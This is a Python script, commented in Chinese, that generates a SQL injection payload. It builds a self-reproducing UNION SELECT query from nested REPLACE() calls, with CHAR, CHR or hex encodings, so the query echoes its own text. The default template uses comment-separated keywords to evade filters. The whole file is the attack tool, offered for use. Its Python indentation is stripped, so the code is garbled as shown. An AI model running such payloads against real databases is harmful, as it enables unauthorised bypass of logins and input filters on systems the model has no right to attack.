# replace_S = REPLACE(REPLACE('replace_A',CHAR(34),CHAR(39)),replace_B的编码,'replace_A')
# replace_A = REPLACE(REPLACE("replace_B",CHAR(34),CHAR(39)),replace_B的编码,"replace_B")
class rep:
replace_S = ""
replace_A = ""
replace_B = ""
replace_charfuc = ""
result = ""
def reppay(self):
self.replace_S = self.replace_S.replace("REPLACE_BASE", "REPLACE(replace_temp,char_B,'replace_A')")
self.replace_S = self.replace_S.replace("replace_temp", "REPLACE('replace_A',tempchar_a,tempchar_b)")
self.replace_A = self.replace_S.replace("'", '"')
self.replace_A = self.replace_A.replace("replace_A", "replace_B")
print("-" * 20)
print("replace_S is " + self.replace_S)
print("replace_A is " + self.replace_A)
print("replace_B is " + self.replace_B)
print("-" * 20)
self.result = self.replace_S.replace("replace_A", self.replace_A)
self.result = self.result.replace("replace_B", self.replace_B)
temp = ""
tempchar_a = ""
tempchar_b = ""
if self.replace_charfuc.lower() == "CHAR".lower():
temp = self.replace_charfuc + "(" + str(ord(self.replace_B)) + ")"
tempchar_a = self.replace_charfuc + "(34)"
tempchar_b = self.replace_charfuc + "(39)"
elif self.replace_charfuc.lower() == "CHR".lower():
temp = self.replace_charfuc + "(" + str(ord(self.replace_B)) + ")"
tempchar_a = self.replace_charfuc + "(34)"
tempchar_b = self.replace_charfuc + "(39)"
elif self.replace_charfuc.lower() == "0x".lower():
temp = self.replace_charfuc + str("".join(hex(ord(self.replace_B)).replace('0x', '')))
tempchar_a = self.replace_charfuc + "22"
tempchar_b = self.replace_charfuc + "27"
else:
exit("ERROR replace_charfuc")
self.result = self.result.replace("char_B", temp)
self.result = self.result.replace("tempchar_a", tempchar_a)
self.result = self.result.replace("tempchar_b", tempchar_b)
print("payload is\n")
print(self.result)
payload = rep()
payload.replace_S = "'/**/union/**/select/**/REPLACE_BASE#" # 需要构造的payload模板,REPLACE部分请用 REPLACE_BASE 代替
payload.replace_B = "B" # 替换过程中的单个字符,必须是单个字符
payload.replace_charfuc = "0x" # ANSI转字符用的函数,可以是0x、CHAR、CHR ,大小写都可以
payload.reppay()